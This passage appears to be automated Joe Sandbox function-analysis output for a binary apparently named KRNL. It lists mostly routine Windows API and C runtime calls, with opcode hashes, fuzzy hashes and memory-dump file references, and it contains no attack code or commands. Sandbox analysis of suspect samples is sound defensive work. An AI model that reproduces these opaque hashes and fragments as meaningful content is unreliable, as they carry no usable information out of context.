                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                          • Opcode ID: e22ffcceac063940905d2516b2c209d756eb65db871cdc34d3589d623c7325d7
                                                                                                                                                                                                                                                          • Instruction ID: 55330b00ffcf60baaa70b3d3506fc531adb40515d8d3c0a1474305c5173a8401
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e22ffcceac063940905d2516b2c209d756eb65db871cdc34d3589d623c7325d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9311E9362007059FDB189F39CC915BAB7D1FF80768B55452CE5474BB80E775B952C740
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007019B4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                          • Opcode ID: 61d972d1b6af41cffd426502b6cb6cb6e8e5b123b18e1be5a19fbb9c47228525
                                                                                                                                                                                                                                                          • Instruction ID: 42b8a6875acbe4bf74320cd65e61e2fb5dae57ea90ee4a08ac6bffa7f799d2f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61d972d1b6af41cffd426502b6cb6cb6e8e5b123b18e1be5a19fbb9c47228525
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111E07261120AEBDB14AF68CC169BA77ECEF05724B10827AE602C7181EB38ED009754
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0070179C,00000000,00000000,?), ref: 00701B39
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                          • Opcode ID: 939136415dab791b4a61d881e4f659dedf7c531ddaa8ac026e7e91716a26a892
                                                                                                                                                                                                                                                          • Instruction ID: a262828e76f6938d1ff6bd9e714e0a23ef5758a960e83c2b0a5d313dfd0da140
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 939136415dab791b4a61d881e4f659dedf7c531ddaa8ac026e7e91716a26a892
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8501F972710116EBDB289B688C09BFA77A8EF40754F558668ED06A31C0FB78FE41C790
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00701840,00000001,?,?,-00000050,?,0070132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0070181D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                          • Opcode ID: e63a29af1d80346a1103b93d32b80f6cc35ffe8b4b36adfd2b07da47f1e404f1
                                                                                                                                                                                                                                                          • Instruction ID: 756d3999243bb1ba125dd05e9da46b5b618c151ba22fd67a1c53ec95ca73a2c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e63a29af1d80346a1103b93d32b80f6cc35ffe8b4b36adfd2b07da47f1e404f1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F022722003049FCB245F79D881A7A7BD1EB80778B05C62CFA014B6C0D6B5AD02C650
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006F80E1: EnterCriticalSection.KERNEL32(?,?,006FC5F8,?,00719290,00000008,006FC4EA,?,?,?), ref: 006F80F0
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(006FD1B0,00000001,00719310,0000000C,006FCB11,-00000050), ref: 006FD1F5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                          • Opcode ID: 07c8cab62339de1180c1d392d72e99001bee6c7951470e7fade13b5f59c3f6b9
                                                                                                                                                                                                                                                          • Instruction ID: da96962606dd1b94b48830cd522ebc4d369403ee759554733e1f505c5b9ebacf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07c8cab62339de1180c1d392d72e99001bee6c7951470e7fade13b5f59c3f6b9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F03C72A00308DFDB10DF9CE842BA977E1EB44721F00C02AF5109B2E0CB795A40CF58
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00701960,00000001,?,?,?,00701385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0070194C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                          • Opcode ID: 785a144e102671f3d913a69fc479e7caa53a33b6169d84f793196eec1efce526
                                                                                                                                                                                                                                                          • Instruction ID: cc4e46ceb32d828bf8313aeeaa280b46722f7e3287929dd0682e6df1eadf0b0c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 785a144e102671f3d913a69fc479e7caa53a33b6169d84f793196eec1efce526
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF0EC3530034997CB049F39DC656777FE4EFC1B60F474058EA058B291C675A842C7A4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,006F6E33,?,20001004,00000000,00000002,?,?,006F5D3D), ref: 006FCC49
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                          • Opcode ID: da587e23328b0621dbe0795a717dd359158bc33bfa6e22d7aab5e2adff82e72f
                                                                                                                                                                                                                                                          • Instruction ID: 42c1771e03bb1cec51f0446f8f50e6990849ba5666d2bbaeebd43f3f7037653b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da587e23328b0621dbe0795a717dd359158bc33bfa6e22d7aab5e2adff82e72f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E04F3150122CBBCF122F64EE05EEE7E17EF44760F048025FE0966261CB359921ABE8
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 006EF8E2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          • Opcode ID: 112ccca70048720e565e0f1552a8269bc65b6fcb558237d09f7f1520aa802cf6
                                                                                                                                                                                                                                                          • Instruction ID: 7fbe9d442c845ac6af27e687fd1051e248fffa33c0c8192c91b78da7d1a10c4c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 112ccca70048720e565e0f1552a8269bc65b6fcb558237d09f7f1520aa802cf6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                          • Opcode ID: 9af7853dae52c762f9401ec03bdd79c4774c18be2c4ed256b6f60fc09e0e8935
                                                                                                                                                                                                                                                          • Instruction ID: c375ff140b6971ebc35ebbe09961bd17162882de1faf97dc0cb48127829967a4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9af7853dae52c762f9401ec03bdd79c4774c18be2c4ed256b6f60fc09e0e8935
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2A002706011418B57504F7959152493599A5455D1705C0655C45C61A4DA3854549F5D
                                                                                                                                                                                                                                                          APIs
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
• Opcode ID: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
• Instruction ID: 341c42c84f5c250b81d4d878749770d96cfdb581091847031405732ae010ab71
• Opcode Fuzzy Hash: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
• Instruction Fuzzy Hash: 0D71E272A00749FBDF219F64CC41FAF77EADF45310F294259E904A72D1EA799C008766
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 006EFE70
• __alloca_probe_16.LIBCMT ref: 006EFE9C
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 006EFEDB
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EFEF8
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006EFF37
• __alloca_probe_16.LIBCMT ref: 006EFF54
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006EFF96
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006EFFB9
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
• Instruction ID: 8a514d65a2c29b63ce07548d9fda97788de5ad821e55bb1fb3a438822cf466fa
• Opcode Fuzzy Hash: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
• Instruction Fuzzy Hash: 6051BE72A0138AAFEF204F66CC45FEB7BAAEF41750F248439F914DA290DB319C108B54
APIs
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
• Instruction ID: 53a2b6661e2d74c74cfcfbc20e3de9288081ca08ff30eea60494de05eccb8fe2
• Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
• Instruction Fuzzy Hash: 2FB15672A01259EFDB21CF24CC91BFE7FA6EF55310F144165EA44AB382DA759901C7A0
APIs
• _ValidateLocalCookies.LIBCMT ref: 006F0D77
• ___except_validate_context_record.LIBVCRUNTIME ref: 006F0D7F
• _ValidateLocalCookies.LIBCMT ref: 006F0E08
• __IsNonwritableInCurrentImage.LIBCMT ref: 006F0E33
• _ValidateLocalCookies.LIBCMT ref: 006F0E88
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 558e0431efedae65852da3528f575500a9fc5d0fa933715d3574d6cf84de41da
• Instruction ID: 694c281a61097a4ca51bfcc6b9b39304c963aa9d2f759b1aa154b3f46cf189b9
• Opcode Fuzzy Hash: 558e0431efedae65852da3528f575500a9fc5d0fa933715d3574d6cf84de41da
• Instruction Fuzzy Hash: 9341C074A0021C9BDF10DF68C884AFEBBA7AF44314F148959EA149B393DB35AE11CB94
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 006E3CA5
• std::_Lockit::_Lockit.LIBCPMT ref: 006E3CBF
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E3CE0
• __Getctype.LIBCPMT ref: 006E3D92
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E3DD8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
• String ID: e.q
• API String ID: 3087743877-2639829087
• Opcode ID: 63aa61f81adc38af409f08ce9777fe27e0def00ca64afffe91047b8aec370fbb
• Instruction ID: 1f729a07bbbb5adc5d9fdeb5a5269754e35ec728f4d795bcd7b305397da966ec
• Opcode Fuzzy Hash: 63aa61f81adc38af409f08ce9777fe27e0def00ca64afffe91047b8aec370fbb
• Instruction Fuzzy Hash: B0413971D013648FCB10DF99D845BAEB7B2FF44B20F188219D8156B391DB79AA01CF95
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006F0086
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006F0094
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006F00A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1047828073
• Opcode ID: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
• Instruction ID: e9b8ae64561f45ce0c7949f3ae10230d7d786c665f964b454091b45a6a29c701
• Opcode Fuzzy Hash: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
• Instruction Fuzzy Hash: FCD09EBA5522106B83115FBC7C09CC93EA9FA09711301C152F441E22D0DA7C65419AED
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3457337e6bd9e202d0c574e7eecf980bc0936f312b3d79a21c6e5436919e4d71
• Instruction ID: 8cf2d19bb5e8a2ad2b5e2a5776c6eaf0bd55c6c08583ad03aab2436cacb0edfe
• Opcode Fuzzy Hash: 3457337e6bd9e202d0c574e7eecf980bc0936f312b3d79a21c6e5436919e4d71
• Instruction Fuzzy Hash: 0DB1E1B4A04A49EFDB11DFA8D840BBEBBF1BF49304F148258E900972C2C7799941CFA4
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9C97
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CA8
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CBC
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CDD
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CEE
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9D06
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0
• Opcode ID: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
• Instruction ID: 9320267bc15885780e24f8158d8190e29c47d907da69b4f21adf2af9b52efddc
• Opcode Fuzzy Hash: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
• Instruction Fuzzy Hash: FE41F5B0902780CBDB30AB6289067EFB7F6AF45724F28062DD57A163D1D3316904CB66
APIs
• GetLastError.KERNEL32(?,?,006FACDE,006F0760,006EB77F,AB1687B8,?,?,?,?,0070BFCA,000000FF), ref: 006FACF5
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006FAD03
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006FAD1C
• SetLastError.KERNEL32(00000000,?,006FACDE,006F0760,006EB77F,AB1687B8,?,?,?,?,0070BFCA,000000FF), ref: 006FAD6E
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: fb94df17d09db5008362fb7756a95dcf03ab174f7653229126aa1ec9fada4ca0
• Instruction ID: ff97f8ed4bc408cf8d7c3fc3b2ad54830fc3a6f8cf20cc3f292b8784dfa646e1
• Opcode Fuzzy Hash: fb94df17d09db5008362fb7756a95dcf03ab174f7653229126aa1ec9fada4ca0
• Instruction Fuzzy Hash: FC01F57220A619DEE7242AB87C498B626C6EF06B75720833AF714457F0EF1558039555
APIs
• type_info::operator==.LIBVCRUNTIME ref: 006FB68D
• CallUnexpected.LIBVCRUNTIME ref: 006FB906
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2673424686-393685449
• Opcode ID: 4b2818c0ed580a6db19a5445873140bceaf561ac419b547d37c9f69b7fee7d31
• Instruction ID: ac47d030443d3a466e2c7c2c504038bfed802992aabd5bc1c8715c08c71212a4
• Opcode Fuzzy Hash: 4b2818c0ed580a6db19a5445873140bceaf561ac419b547d37c9f69b7fee7d31
• Instruction Fuzzy Hash: 79B1677580020DEFCF14DFA4C8819BEBBBABF44310B14555AEA25AB212D731DA51CF96
APIs
• std::_Ref_count_base::_Decref.LIBCPMT ref: 006EBF44
• std::_Ref_count_base::_Decref.LIBCPMT ref: 006EC028
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
